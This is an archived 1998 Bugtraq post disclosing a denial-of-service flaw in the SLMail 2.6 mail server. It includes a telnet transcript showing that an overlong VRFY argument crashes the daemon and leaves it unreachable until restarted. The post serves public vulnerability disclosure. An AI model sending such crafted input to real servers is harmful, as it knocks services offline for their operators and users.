Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SLMail 2.6 DoS

From: steven () EFNI COM (Steven)
Date: Wed, 11 Mar 1998 20:44:56 -0500

Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0 @ Undernet
steven () efni com
Previous By Date Next
Previous By Thread Next

Current thread: